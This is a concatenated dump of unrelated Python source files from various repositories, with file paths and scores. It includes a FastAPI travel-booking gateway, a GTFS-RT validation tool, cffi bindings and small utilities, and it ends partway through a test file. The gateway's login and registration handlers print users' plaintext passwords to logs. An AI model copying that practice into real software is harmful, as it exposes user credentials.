op|')'
newline|'\n'
dedent|''
dedent|''
endmarker|''
end_unit
| 1.257813 | 1 |
WEEKS/CD_Sata-Structures/_RESOURCES/python-prac/mini-scripts/python_negative_indexing_Access_Array_Elements.txt.py | webdevhub42/Lambda | 5 | 12786288 | <filename>WEEKS/CD_Sata-Structures/_RESOURCES/python-prac/mini-scripts/python_negative_indexing_Access_Array_Elements.txt.py
import numpy as np
arr = np.array([[1, 2, 3, 4, 5], [6, 7, 8, 9, 10]])
print("Last element from 2nd dim: ", arr[1, -1])
| 3.390625 | 3 |
api_gateway/main.py | leckijakub/hipotap | 0 | 12786289 | import asyncio
import sys
import time
import datetime
from queue import Queue
from threading import Thread
from typing import Optional
from fastapi import FastAPI, Form, HTTPException, Request
from fastapi.middleware.cors import CORSMiddleware
from sse_starlette.sse import EventSourceResponse
from google.protobuf import json_format
from hipotap_common.api.endpoints import (
GET_ORDER_PATH,
GET_TRENDS_PATH,
ORDER_PAYMENT_PATH,
ORDER_RESERVE_REQUEST_PATH,
ORDER_LIST_PATH,
ORDER_LISTEN_PATH,
OFFER_PATH,
OFFER_FILTERING_PATH,
OFFER_LISTEN_PATH
)
from hipotap_common.proto_messages.auth_pb2 import AuthStatus
from hipotap_common.proto_messages.customer_pb2 import CustomerCredentialsPB, CustomerPB
from hipotap_common.proto_messages.hipotap_pb2 import BaseStatus
from hipotap_common.proto_messages.order_pb2 import (
GetOrderRequestPB,
OrderPB,
OrderPaymentRequestPB,
OrderRequestPB,
OrderListRequestPB,
)
from hipotap_common.proto_messages.offer_pb2 import (
OfferFilterPB
)
from pydantic import BaseModel
from hipotap_common.rpc.clients.customer_rpc_client import CustomerRpcClient
from hipotap_common.rpc.clients.offer_rpc_client import OfferRpcClient
from hipotap_common.rpc.clients.order_rpc_client import OrderRpcClient
from hipotap_common.rpc.clients.events_fanout_client import EventFanoutClient
CUSTOMER_AUTH_QUEUE = "customer_auth"
class AuthData(BaseModel):
email: str
password: str
app = FastAPI()
origins = [
"http://localhost:17212",
"http://localhost:17213",
]
app.add_middleware(
CORSMiddleware,
allow_origins=origins,
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
time.sleep(5)
@app.post("/customer/authenticate/")
async def authenticate(email: str = Form(...), password: str = Form(...)):
print(f"Got [POST]/customer/authenticate/ with email={email}&password={password}")
sys.stdout.flush()
customer_credentials = CustomerCredentialsPB()
customer_credentials.email = email
customer_credentials.password = password
customer_client = CustomerRpcClient()
auth_response_pb = customer_client.authenticate(customer_credentials)
if auth_response_pb.status == AuthStatus.OK:
print("Authentication OK")
sys.stdout.flush()
return {
"name": auth_response_pb.customer_data.name,
"surname": auth_response_pb.customer_data.surname,
}
else:
raise HTTPException(status_code=401, detail="Invalid credentials")
@app.post("/customer/register/")
async def register(
name: str = Form(...),
surname: str = Form(...),
email: str = Form(...),
password: str = Form(...),
):
print(
f"Got [POST]/customer/register/ with name={name}, surname={surname}, email={email}, password={password}"
)
sys.stdout.flush()
customer_client = CustomerRpcClient()
customer_pb = CustomerPB()
customer_pb.data.name = name
customer_pb.data.surname = surname
customer_pb.credentials.email = email
customer_pb.credentials.password = password
reg_response = customer_client.register(customer_pb)
if reg_response.status == BaseStatus.OK:
print("Registration OK")
sys.stdout.flush()
return {"status": "OK"}
else:
raise HTTPException(status_code=401, detail="Email is taken")
@app.get("/offers/")
async def offers():
print(f"Got [GET]/offers/", flush=True)
offer_client = OfferRpcClient()
offer_list_pb = offer_client.get_offers()
return json_format.MessageToDict(
offer_list_pb,
preserving_proto_field_name=True,
including_default_value_fields=True,
)
@app.get(OFFER_PATH + "{offer_id}")
async def offers(offer_id: int):
print(f"Got [GET]/offer/{offer_id}", flush=True)
offer_client = OfferRpcClient()
offer_pb = offer_client.get_offer(offer_id)
return json_format.MessageToDict(
offer_pb,
preserving_proto_field_name=True,
including_default_value_fields=True,
)
@app.get(OFFER_FILTERING_PATH)
async def offers_filtered(
allowed_adult_count: Optional[int] = Form(None),
allowed_children_count: Optional[int] = Form(None),
max_adult_price: Optional[float] = Form(None),
max_children_price: Optional[float] = Form(None),
hotel: Optional[str] = Form(None),
place: Optional[str] = Form(None),
date_start: Optional[str] = Form(None),
date_end: Optional[str] = Form(None)
):
print(f"Got [GET]/offer/filter/ with "
f"allowed_adult_count={allowed_adult_count}, "
f"allowed_children_count={allowed_children_count}, "
f"max_adult_price={max_adult_price}, "
f"max_children_price = {max_children_price}, "
f"hotel={hotel}, "
f"place={place}, "
f"date_start={date_start}, "
f"date_end={date_end}", flush=True)
offer_client = OfferRpcClient()
offer_filter_pb = OfferFilterPB()
offer_filter_pb.use_allowed_adult_count = allowed_adult_count is not None
offer_filter_pb.use_allowed_children_count = allowed_children_count is not None
offer_filter_pb.use_max_adult_price = max_adult_price is not None
offer_filter_pb.use_max_children_price = max_children_price is not None
offer_filter_pb.use_place = place is not None
offer_filter_pb.use_hotel = hotel is not None
offer_filter_pb.use_date_start = date_start is not None
offer_filter_pb.use_date_end = date_end is not None
if offer_filter_pb.use_allowed_adult_count:
offer_filter_pb.allowed_adult_count = allowed_adult_count
if offer_filter_pb.use_allowed_children_count:
offer_filter_pb.allowed_children_count = allowed_children_count
if offer_filter_pb.use_max_adult_price:
offer_filter_pb.max_adult_price = max_adult_price
if offer_filter_pb.use_max_children_price:
offer_filter_pb.max_children_price = max_children_price
if offer_filter_pb.use_place:
offer_filter_pb.place = place
if offer_filter_pb.use_hotel:
offer_filter_pb.hotel = hotel
if offer_filter_pb.use_date_start:
offer_filter_pb.date_start.FromDatetime(datetime.datetime.strptime(date_start, "%Y-%m-%d"))
if offer_filter_pb.use_date_end:
offer_filter_pb.date_end.FromDatetime(datetime.datetime.strptime(date_end, "%Y-%m-%d"))
offer_list_pb = offer_client.get_offers_filtered(offer_filter_pb)
return json_format.MessageToDict(
offer_list_pb,
preserving_proto_field_name=True,
including_default_value_fields=True,
)
@app.post(ORDER_RESERVE_REQUEST_PATH)
async def order_reserve_request(
offer_id: int = Form(...),
customer_email: str = Form(...),
adult_count: int = Form(...),
children_count: int = Form(...),
):
order_client = OrderRpcClient()
order_request_pb = OrderRequestPB()
order_request_pb.offer_id = offer_id
order_request_pb.customer_email = customer_email
order_request_pb.adult_count = adult_count
order_request_pb.children_count = children_count
order_response = order_client.order_reserve_request(order_request_pb)
if order_response.status == BaseStatus.OK:
print("Order OK", flush=True)
order_pb = OrderPB()
order_response.message.Unpack(order_pb)
return json_format.MessageToDict(
order_pb,
preserving_proto_field_name=True,
including_default_value_fields=True,
)
else:
raise HTTPException(status_code=401, detail="Cannot order offer")
@app.get(ORDER_LIST_PATH)
async def order_list_request(customer_email: str = Form(...)):
order_client = OrderRpcClient()
order_list_request_pb = OrderListRequestPB()
order_list_request_pb.customer_email = customer_email
order_list_pb = order_client.get_order_list(order_list_request_pb)
return json_format.MessageToDict(
order_list_pb,
preserving_proto_field_name=True,
including_default_value_fields=True,
)
@app.get(GET_ORDER_PATH)
async def get_order_request(order_id: int = Form(...)):
order_client = OrderRpcClient()
get_order_request_PB = GetOrderRequestPB()
get_order_request_PB.order_id = order_id
order_pb = order_client.get_order(get_order_request_PB)
return json_format.MessageToDict(
order_pb,
preserving_proto_field_name=True,
including_default_value_fields=True,
)
@app.post(ORDER_PAYMENT_PATH)
async def order_payment_request(
order_id: int = Form(...),
card_number: str = Form(...),
price: float = Form(...),
):
order_client = OrderRpcClient()
order_paymet_request_pb = OrderPaymentRequestPB()
order_paymet_request_pb.order_id = order_id
order_paymet_request_pb.payment_info.card_number = card_number
order_paymet_request_pb.payment_info.price = price
payment_response = order_client.order_payment_request(order_paymet_request_pb)
if payment_response.status == BaseStatus.OK:
print("Payment OK", flush=True)
return {"status": "OK"}
else:
raise HTTPException(status_code=401, detail="Cannot pay order")
MESSAGE_STREAM_RETRY_TIMEOUT = 15000 # milisecond - change also in events_fanout_client (bad code)
MESSAGE_STREAM_DELAY = 1 # second (or maybe this one should be in events_fanout_client) (very bad code)
def event_receiving(event_queue: Queue, event_type):
print("THREAD START", flush=True)
event_fanout_client = EventFanoutClient(event_queue, event_type)
event_fanout_client.start_consuming()
print("THREAD EXIT", flush=True)
@app.get(OFFER_LISTEN_PATH + "{offer_id}")
async def get_offer_events(offer_id: int, request: Request):
#event_client = EventRpcClient()
#new_offer_PB =
print(f"GOT /offer/listen/{offer_id}")
async def event_generator(request: Request):
event_queue = Queue()
event_receiver_thread = Thread(target=event_receiving, args=(event_queue, "offer", ))
print("THREAD CREATED", flush=True)
event_receiver_thread.start()
try:
while True:
if await request.is_disconnected():
break
while not event_queue.empty():
# todo: process message
print("EVENT", flush=True)
yield {
"event": "message",
"id": "message_id",
"retry": MESSAGE_STREAM_RETRY_TIMEOUT,
"data": event_queue.get()
}
else:
print(f"No events in a queue", flush=True)
await asyncio.sleep(MESSAGE_STREAM_DELAY)
except asyncio.CancelledError as e:
print(f"Disconnected client - {request.client}", flush=True)
finally:
print(f"Finally", flush=True)
return EventSourceResponse(event_generator(request))
@app.get(ORDER_LISTEN_PATH + "{order_id}")
async def get_order_events(order_id: int, request: Request):
#event_client = EventRpcClient()
#new_offer_PB =
print(f"GOT /order/listen/{order_id}")
async def event_generator(request: Request):
event_queue = Queue()
event_receiver_thread = Thread(target=event_receiving, args=(event_queue, "order", ))
print("THREAD CREATED", flush=True)
event_receiver_thread.start()
try:
while True:
if await request.is_disconnected():
break
while not event_queue.empty():
# todo: process message
print("EVENT", flush=True)
yield {
"event": "message",
"id": "message_id",
"retry": MESSAGE_STREAM_RETRY_TIMEOUT,
"data": event_queue.get()
}
else:
print(f"No events in a queue", flush=True)
await asyncio.sleep(MESSAGE_STREAM_DELAY)
except asyncio.CancelledError as e:
print(f"Disconnected client - {request.client}", flush=True)
finally:
print(f"Finally", flush=True)
return EventSourceResponse(event_generator(request))
@app.get(GET_TRENDS_PATH)
async def get_trends_request():
orders_client = OrderRpcClient()
trends_pb = orders_client.get_trends_request()
return json_format.MessageToDict(
trends_pb,
preserving_proto_field_name=True,
including_default_value_fields=True,
)
| 1.804688 | 2 |
datapypes/model.py | msmathers/datapypes | 1 | 12786290 | <filename>datapypes/model.py
from attribute import Attribute, InvalidAttributeValue
from source import Source
from store import Store
class InvalidAttribute(Exception): pass
class AttributeDoesNotExist(Exception): pass
class InvalidSource(Exception): pass
class InvalidStore(Exception): pass
class PypeDoesNotExist(Exception): pass
class Model(object):
__pypes__ = {}
def __init__(self, **attributes):
self._data = {}
# Validate model attributes
for k,v in attributes.items():
setattr(self, k, v)
# Nullify missing attributes
for attr in self._attributes:
if attr not in self._data:
setattr(self, attr, None)
# Validate model
self._validate()
def _validate(self):
return True
# Attribute validation
@property
def _attributes(self):
#Ensure Model attributes have been registered
if not hasattr(self.__class__, '__attributes__'):
self.__class__.__attributes__ = {}
for k,v in self.__class__.__dict__.items():
if isinstance(v, Attribute):
self.__class__.__attributes__[k] = v
return self.__class__.__attributes__
def _validate_attribute(self, attr, val):
attribute = self._attributes.get(attr)
if attribute is None:
raise AttributeDoesNotExist(attr)
if not attribute._validate(val):
raise InvalidAttribute(attr, attribute.__class__.__name__, val)
return True
def __setattr__(self, attr, value):
if attr in self._attributes:
if self._data.get(attr) is None:
if self._validate_attribute(attr, value):
self._data[attr] = value
self.__dict__[attr] = value
else:
raise InvalidAttribute(attr, value)
else:
self.__dict__[attr] = value
def _update(self, model):
for k,v in model._data.items():
setattr(self, k, v)
# Source methods
def get(self, *sources):
for source in sources:
if not isinstance(source, Source):
raise InvalidSource(source)
pype = self.__pypes__.get(self.__class__,{}).get(source.__class__)
if pype is None:
raise PypeDoesNotExist(self.__class__, source.__class__)
self._update(pype(self, source).one(self))
return self
# Store methods
def _store_action(self, method, *stores):
for store in stores:
if not isinstance(store, Store):
raise InvalidStore(store)
pype = self.__pypes__.get(self.__class__,{}).get(store.__class__)
if pype is None:
raise PypeDoesNotExist(self.__class__, store.__class__)
getattr(pype(self, store), method)(self)
return self
def save(self, *stores):
return self._store_action('save', *stores)
def update(self, *stores):
return self._store_action('update', *stores)
def delete(self, *stores):
return self._store_action('delete', *stores) | 2.625 | 3 |
solentware_grid/tests/__init__.py | RogerMarsh/solentware-grid | 0 | 12786291 | """Unittests for solentware_grid package.
"PACKAGE CONTENTS" is incomplete because all the unittests are stubs.
"""
| 0.988281 | 1 |
prompt_toolkit/filters/types.py | gigforks/python-prompt-toolkit | 1 | 12786292 | from __future__ import unicode_literals
from inspect import ArgSpec
from six import with_metaclass
__all__ = (
'CLIFilter',
'SimpleFilter',
'check_signatures_are_equal',
)
class _FilterTypeMeta(type):
def __instancecheck__(cls, instance):
if not hasattr(instance, 'getargspec'):
return False
arguments = _drop_self(instance.getargspec())
return arguments.args == cls.arguments_list or arguments.varargs is not None
class _FilterType(with_metaclass(_FilterTypeMeta)):
def __new__(cls):
raise NotImplementedError('This class should not be initiated.')
class CLIFilter(_FilterType):
"""
Abstract base class for filters that accept a
:class:`~prompt_toolkit.interface.CommandLineInterface` argument. It cannot
be instantiated, it's only to be used for instance assertions, e.g.::
isinstance(my_filter, CliFilter)
"""
arguments_list = ['cli']
class SimpleFilter(_FilterType):
"""
Abstract base class for filters that don't accept any arguments.
"""
arguments_list = []
def _drop_self(spec):
"""
Take an argspec and return a new one without the 'self'.
"""
args, varargs, varkw, defaults = spec
if args[0:1] == ['self']:
args = args[1:]
return ArgSpec(args, varargs, varkw, defaults)
def check_signatures_are_equal(lst):
"""
Check whether all filters in this list have the same signature.
Raises `TypeError` if not.
"""
spec = _drop_self(lst[0].getargspec())
for f in lst[1:]:
if _drop_self(f.getargspec()) != spec:
raise TypeError('Trying to chain filters with different signature: %r and %r' %
(lst[0], f))
| 2.28125 | 2 |
setup.py | alena-lark/PrintNumAtom | 0 | 12786293 | <filename>setup.py
from setuptools import setup, find_packages
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name="printnum",
version="0.1.9",
author="alena-lark",
author_email="<EMAIL>",
description="Printing a number of atoms in a molecule",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/alena-lark/PrintNumAtom",
packages=find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
install_requares=['numpy', 'rdkit'],
python_requires='>=3.7'
)
| 1.601563 | 2 |
gtfs_rt_validator_api.py | cal-itp/gtfs-rt-api | 0 | 12786294 | __version__ = "0.0.1"
import os
import json
import subprocess
import shutil
import pandas as pd
import argh
from tempfile import TemporaryDirectory, NamedTemporaryFile
from pathlib import Path
from collections import defaultdict
RT_BUCKET_FOLDER="gs://gtfs-data/rt"
RT_BUCKET_PROCESSED_FOLDER="gs://gtfs-data/rt-processed"
SCHEDULE_BUCKET_FOLDER="gs://gtfs-data/schedule"
# Note that the final {extraction_date} is needed by the validator, which may read it as
# timestamp data. Note that the final datetime requires Z at the end, to indicate
# it's a ISO instant
RT_FILENAME_TEMPLATE="{extraction_date}__{itp_id}__{url_number}__{src_fname}__{extraction_date}Z.pb"
N_THREAD_WORKERS = 30
try:
JAR_PATH = os.environ["GTFS_VALIDATOR_JAR"]
except KeyError:
raise Exception("Must set the environment variable GTFS_VALIDATOR_JAR")
# Utility funcs ----
def json_to_newline_delimited(in_file, out_file):
data = json.load(open(in_file))
with open(out_file, "w") as f:
f.write("\n".join([json.dumps(record) for record in data]))
def parse_pb_name_data(file_name):
"""Returns data encoded in extraction files, such as datetime or itp id.
>>> parse_pb_name_data("2021-01-01__1__0__filename__etc")
{'extraction_date': '2021-01-01', 'itp_id': 1, 'url_number': 0, 'src_fname': 'filename'}
"""
extraction_date, itp_id, url_number, src_fname, *_ = Path(file_name).name.split("__")
return dict(
extraction_date = extraction_date,
itp_id = int(itp_id),
url_number = int(url_number),
src_fname = src_fname)
def build_pb_validator_name(extraction_date, itp_id, url_number, src_fname):
"""Return name for file in the format needed for validation.
Note that the RT validator needs to use timestamps at the end of the filename,
so this function ensures they are present.
"""
return RT_FILENAME_TEMPLATE.format(
extraction_date=extraction_date,
itp_id=itp_id,
url_number=url_number,
src_fname=src_fname
)
# Validation ==================================================================
def gather_results(rt_path):
# TODO: complete functionality to unpack results into a DataFrame
# Path(rt_path).glob("*.results.json")
raise NotImplementedError()
def validate(gtfs_file, rt_path, verbose=False):
if not isinstance(gtfs_file, str):
raise NotImplementedError("gtfs_file must be a string")
stderr = subprocess.DEVNULL if not verbose else None
stdout = subprocess.DEVNULL if not verbose else None
subprocess.check_call([
"java",
"-jar", JAR_PATH,
"-gtfs", gtfs_file,
"-gtfsRealtimePath", rt_path,
"-sort", "name",
], stderr=stderr, stdout=stdout)
def validate_gcs_bucket(
project_id, token, gtfs_schedule_path, gtfs_rt_glob_path=None,
out_dir=None, results_bucket=None, verbose=False, aggregate_counts=False,
):
"""
Fetch and validate GTFS RT data held in a google cloud bucket.
Parameters:
project_id: name of google cloud project.
token: token argument passed to gcsfs.GCSFileSystem.
gtfs_schedule_path: path to a folder holding unpacked GTFS schedule data.
gtfs_rt_glob_path: path that GCSFileSystem.glob can uses to list all RT files.
Note that this is assumed to have the form {datetime}/{itp_id}/{url_number}/filename.
out_dir: a directory to store fetched files and results in.
results_bucket: a bucket path to copy results to.
verbose: whether to print helpful messages along the way.
Note that if out_dir is unspecified, the validation occurs in a temporary directory.
"""
import gcsfs
fs = gcsfs.GCSFileSystem(project_id, token=token)
if not out_dir:
tmp_dir = TemporaryDirectory()
tmp_dir_name = tmp_dir.name
else:
tmp_dir = None
tmp_dir_name = out_dir
if results_bucket and not aggregate_counts and results_bucket.endswith("/"):
results_bucket = f"{results_bucket}/"
final_json_dir = Path(tmp_dir_name) / "newline_json"
try:
print("Fetching data")
dst_path_gtfs = f"{tmp_dir_name}/gtfs"
dst_path_rt = f"{tmp_dir_name}/rt"
# fetch and zip gtfs schedule
download_gtfs_schedule_zip(gtfs_schedule_path, dst_path_gtfs, fs)
# fetch rt data
if gtfs_rt_glob_path is None:
raise ValueError("One of gtfs rt glob path or date must be specified")
download_rt_files(dst_path_rt, fs, glob_path = gtfs_rt_glob_path)
print("Validating data")
validate(f"{dst_path_gtfs}.zip", dst_path_rt, verbose=verbose)
if results_bucket and aggregate_counts:
print(f"Saving aggregate counts as: {results_bucket}")
error_counts = rollup_error_counts(dst_path_rt)
df = pd.DataFrame(error_counts)
with NamedTemporaryFile() as tmp_file:
df.to_parquet(tmp_file.name)
fs.put(tmp_file.name, results_bucket)
elif results_bucket and not aggregate_counts:
# validator stores results as {filename}.results.json
print(f"Putting data into results bucket: {results_bucket}")
# fetch all results files created by the validator
all_results = list(Path(dst_path_rt).glob("*.results.json"))
final_json_dir.mkdir(exist_ok=True)
final_files = []
for result in all_results:
# we appended a final timestamp to the files so that the validator
# can use it to order them during validation. here, we remove that
# timestamp, so we can use a single wildcard to select, eg..
# *trip_updates.results.json
result_out = "__".join(result.name.split("__")[:-1])
json_to_newline_delimited(result, final_json_dir / result_out)
final_files.append(final_json_dir / result_out)
fs.put(final_files, results_bucket)
except Exception as e:
raise e
finally:
if isinstance(tmp_dir, TemporaryDirectory):
tmp_dir.cleanup()
def validate_gcs_bucket_many(
project_id, token, param_csv,
results_bucket=None, verbose=False, aggregate_counts=False,
status_result_path=None, strict=False, result_name_prefix="result_"
):
"""Validate many gcs buckets using a parameter file.
Additional Arguments:
strict: whether to raise an error when a validation fails
status_result_path: directory for saving the status of validations
result_name_prefix: a name to prefix to each result file name. File names
will be numbered. E.g. result_0.parquet, result_1.parquet for two feeds.
Param CSV should contain the following fields (passed to validate_gcs_bucket):
* gtfs_schedule_path
* gtfs_rt_glob_path
The full parameters CSV is dumped to JSON with an additional column called
is_status, which reports on whether or not the validation was succesfull.
"""
import gcsfs
required_cols = ["gtfs_schedule_path", "gtfs_rt_glob_path"]
fs = gcsfs.GCSFileSystem(project_id, token=token)
params = pd.read_csv(fs.open(param_csv))
# check that the parameters file has all required columns
missing_cols = set(required_cols) - set(params.columns)
if missing_cols:
raise ValueError("parameter csv missing columns: %s" % missing_cols)
status = []
for idx, row in params.iterrows():
try:
validate_gcs_bucket(
project_id,
token,
results_bucket=results_bucket + f"/{result_name_prefix}{idx}.parquet",
verbose=verbose,
aggregate_counts=aggregate_counts,
**row[required_cols]
)
status.append({**row, "is_success": True})
except Exception as e:
if strict:
raise e
status.append({**row, "is_success": False})
status_newline_json = "\n".join([json.dumps(record) for record in status])
if status_result_path:
fs.pipe(status_result_path, status_newline_json.encode())
def download_gtfs_schedule_zip(gtfs_schedule_path, dst_path, fs):
# fetch and zip gtfs schedule
fs.get(gtfs_schedule_path, dst_path, recursive=True)
shutil.make_archive(dst_path, "zip", dst_path)
def download_rt_files(dst_dir, fs=None, date="2021-08-01", glob_path=None):
"""Download all files for an GTFS RT feed (or multiple feeds)
If date is specified, downloads daily data for all feeds. Otherwise, if
glob_path is specified, downloads data for a single feed.
Parameters:
date: date of desired feeds to download data from (e.g. 2021-09-01)
glob_path: if specified, the path (including a wildcard) for downloading a
single feed.
"""
if fs is None:
raise NotImplementedError("Must specify fs")
# {date}T{timestamp}/{itp_id}/{url_number}
all_files = fs.glob(glob_path) if glob_path else fs.glob(f"{RT_BUCKET_FOLDER}/{date}*/*/*/*")
to_copy = []
out_feeds = defaultdict(lambda: [])
for src_path in all_files:
dt, itp_id, url_number, src_fname = src_path.split("/")[-4:]
if glob_path:
dst_parent = Path(dst_dir)
else:
# if we are downloading multiple feeds, make each feed a subdir
dst_parent = Path(dst_dir) / itp_id / url_number
dst_parent.mkdir(parents=True, exist_ok=True)
out_fname = build_pb_validator_name(dt, itp_id, url_number, src_fname)
dst_name = str(dst_parent / out_fname)
to_copy.append([src_path, dst_name])
out_feeds[(itp_id, url_number)].append(dst_name)
print(f"Copying {len(to_copy)} files")
src_files, dst_files = zip(*to_copy)
fs.get(list(src_files), list(dst_files))
# Rectangling =================================================================
def rollup_error_counts(rt_dir):
result_files = Path(rt_dir).glob("*.results.json")
code_counts = []
for path in result_files:
metadata = parse_pb_name_data(path)
result_json = json.load(path.open())
for entry in result_json:
code_counts.append({
"calitp_itp_id": metadata["itp_id"],
"calitp_url_number": metadata["url_number"],
"calitp_extracted_at": metadata["extraction_date"],
"rt_feed_type": metadata["src_fname"],
"error_id": entry["errorMessage"]["validationRule"]["errorId"],
"n_occurrences": len(entry["occurrenceList"])
})
return code_counts
# Main ========================================================================
def main():
# TODO: make into simple CLI
result = argh.dispatch_commands([
validate, validate_gcs_bucket
])
if result is not None:
print(json.dumps(result))
if __name__ == "__main__":
main()
| 2.484375 | 2 |
src/wrappers/python/pygroupsig/blindsig_build.py | jmakr0/libgroupsig | 17 | 12786295 | # file "blindsig_build.py"
from pygroupsig.common_build import ffibuilder
ffibuilder.cdef("""
typedef struct {
uint8_t scheme;
void *sig;
} groupsig_blindsig_t;
""")
ffibuilder.cdef("""
typedef groupsig_blindsig_t* (*groupsig_blindsig_init_f)(void);
""")
ffibuilder.cdef("""
typedef int (*groupsig_blindsig_free_f)(groupsig_blindsig_t *blindsig);
""")
ffibuilder.cdef("""
typedef int (*groupsig_blindsig_copy_f)(groupsig_blindsig_t *dst, groupsig_blindsig_t *src);
""")
ffibuilder.cdef("""
typedef int (*groupsig_blindsig_get_size_f)(groupsig_blindsig_t *sig);
""")
ffibuilder.cdef("""
typedef int (*groupsig_blindsig_export_f)(unsigned char **bytes,
uint32_t *size,
groupsig_blindsig_t *blindsig);
""")
ffibuilder.cdef("""
typedef groupsig_blindsig_t* (*groupsig_blindsig_import_f)(unsigned char *source,
uint32_t size);
""")
ffibuilder.cdef("""
typedef char* (*groupsig_blindsig_to_string_f)(groupsig_blindsig_t *blindsig);
""")
ffibuilder.cdef("""
typedef struct {
uint8_t scheme;
groupsig_blindsig_init_f init;
groupsig_blindsig_free_f free;
groupsig_blindsig_copy_f copy;
groupsig_blindsig_get_size_f get_size;
groupsig_blindsig_export_f gexport;
groupsig_blindsig_import_f gimport;
groupsig_blindsig_to_string_f to_string;
} groupsig_blindsig_handle_t;
""")
ffibuilder.cdef("""
const groupsig_blindsig_handle_t* groupsig_blindsig_handle_from_code(uint8_t code);
""")
ffibuilder.cdef("""
groupsig_blindsig_t* groupsig_blindsig_init(uint8_t code);
""")
ffibuilder.cdef("""
int groupsig_blindsig_free(groupsig_blindsig_t *sig);
""")
ffibuilder.cdef("""
int groupsig_blindsig_copy(groupsig_blindsig_t *dst, groupsig_blindsig_t *src);
""")
ffibuilder.cdef("""
int groupsig_blindsig_get_size(groupsig_blindsig_t *sig);
""")
ffibuilder.cdef("""
int groupsig_blindsig_export(
unsigned char **bytes,
uint32_t *size,
groupsig_blindsig_t *sig);
""")
ffibuilder.cdef("""
groupsig_blindsig_t* groupsig_blindsig_import(
uint8_t code,
unsigned char *source,
uint32_t size);
""")
ffibuilder.cdef("""
char* groupsig_blindsig_to_string(groupsig_blindsig_t *sig);
""")
| 1.984375 | 2 |
pcloudapi/pcloudjson.py | tochev/python3-pcloudapi | 6 | 12786296 | <gh_stars>1-10
#!/usr/bin/env python3
import requests
from .connection import AbstractPCloudConnection
PCLOUD_SERVER = "api.pcloud.com"
PCLOUD_PORT = 80
PCLOUD_SSL_PORT = 443
class PCloudJSONConnection(AbstractPCloudConnection):
"""Connection to pcloud.com based on their json protocol.
NOTE: loads the whole file in memory on data upload.
"""
def __init__(self,
use_ssl=True,
server=PCLOUD_SERVER, port=None,
timeout=30,
auth=None,
persistent_params=None):
"""Connection to pcloud.com based on their json protocol.
persistent_params is a dict that augments params on each command,
this is useful for storing auth data.
NOTE: persistent_params overrides any values in params on send_command
"""
self.use_ssl = use_ssl
self.timeout = timeout
if persistent_params is None:
self.persistent_params = {}
else:
self.persistent_params = persistent_params
if auth is not None:
self.auth = auth
self.baseurl = "{protocol}://{server}:{port}/".format(
protocol=use_ssl and 'https' or 'http',
server=server,
port=port or (use_ssl and 443 or 80)
)
def send_command(self, method, **params):
"""Sends command and returns result. Blocks if result is needed.
:param method: the pcloud method to call
:param **params: parameters to be passed to the api, except:
- '_data' is the file data
- '_data_progress_callback' is the upload callback
:returns dictionary returned by the api
"""
data = params.pop('_data', None)
data_progress_callback = params.pop('_data_progress_callback', None)
params.update(self.persistent_params)
#TODO: actually use the callback, probably chunk encoding
execute_request = data is None and requests.get or requests.put
#FIXME: currently loads the whole file into memory
r = execute_request(self.baseurl + method,
params=params,
data=data,
allow_redirects=False,
timeout=self.timeout)
r.raise_for_status()
return r.json()
| 3.5 | 4 |
foreignLangOCR/lib/detect.py | ravip18596/foreignLangOCR | 1 | 12786297 | <gh_stars>1-10
from tesserocr import PyTessBaseAPI, PSM, RIL, iterate_level
import pytesseract
from PIL import Image
class Const:
lang = 'hin'
psm = 3
def detect_hindi(img: Image):
ocr_api = PyTessBaseAPI(psm=PSM.SPARSE_TEXT, lang=Const.lang)
meta, response = [], []
img_width, img_height = img.size
print("started processing image")
ocr_api.SetImage(img)
ocr_api.Recognize()
level = RIL.TEXTLINE
results = ocr_api.GetIterator()
line = 0
for r in iterate_level(results, level):
text = r.GetUTF8Text(level)
text = text.replace('\n', '')
bb = r.BoundingBox(level)
confidence = r.Confidence(level)
confidence = "{:.2f}".format(confidence)
meta.append({
'text': text,
'confidence': confidence,
'bb_box': bb,
'img_width': img_width,
'img_height': img_height,
'line': line
})
response.append(text)
line += 1
return response
def detect_hindi_tesseract(img: Image):
text = pytesseract.image_to_string(img, lang=Const.lang)
response = text.split('\n')
return response
| 2.828125 | 3 |
manage.py | johannes-gehrs/centos_packages | 9 | 12786298 | from __future__ import absolute_import, division, unicode_literals
import argparse
import sys
import time
import config
import packages
import index
def _stopwatch(start_time):
return "Done. Time elapsed in seconds: " + unicode(time.time() - start_time)
def _download():
start_time = time.time()
print "Starting downloads. This can take up to a few minutes."
packages.download()
print _stopwatch(start_time)
def _index_refresh():
start_time = time.time()
print "Starting indexing. This can take a minute."
index.write_indices()
print _stopwatch(start_time)
def _search(query, os_version):
if not os_version in config.OS_VERSIONS:
print "Unknown os_version."
sys.exit(1)
searchkit = index.searchkit_factory()
searcher = searchkit[os_version]['ix'].searcher()
myparser = searchkit[os_version]['parser']
start_time = time.time()
results = searcher.search(myparser.parse(query))
for result in results:
print result
print _stopwatch(start_time)
def _set_package_timestamp_to_now():
packages.set_timestamp_to_now()
print "Done setting package data timestamp to current time and date."
parser = argparse.ArgumentParser(description='Manage Centos Packages stuff.')
parser.add_argument('--download',
help='Download repo data from web.',
action='store_true')
parser.add_argument('--index',
help='Recreate the search index from the repo data.',
action='store_true')
parser.add_argument('--search',
help='Search for packages from the commmand line.',
action='store')
parser.add_argument('--version',
help='Only with "search" and "timestamp" option. '
'Specifies version to search in.',
action='store')
parser.add_argument('--packages_timestamp',
help="Sets timestamp of package data to now which indicats that "
"they are fresh to webapp.",
action='store_true')
args = parser.parse_args()
if not any([args.download, args.index, args.search, args.packages_timestamp]):
print "At least one option is required. See --help."
sys.exit(1)
def _requires_version():
if not args.version:
print "Please specify version."
sys.exit(1)
if args.download:
_download()
if args.index:
_index_refresh()
if args.search:
_requires_version()
_search(args.search, args.version)
if args.packages_timestamp:
_set_package_timestamp_to_now()
| 2.578125 | 3 |
test/test_processor.py | miguelaferreira/transmission-postprocess | 0 | 12786299 | import unittest
from os import listdir
from os.path import basename, dirname, realpath
from shutil import copy2
from tempfile import NamedTemporaryFile, mkdtemp
from trdone.actions import NoAction, CopyAction, UnrarAction
from trdone.processor import Processor
class TestProcessor(unittest.TestCase):
def test_process_file_when_it_is_a_directory(self):
processor = Processor(None, None)
source = mkdtemp()
action = processor._process_file(source, None)
self.assertEquals(action, NoAction(source, None))
def test_process_file_when_it_is_a_file(self):
destination = 'destination'
processor = Processor(None, destination)
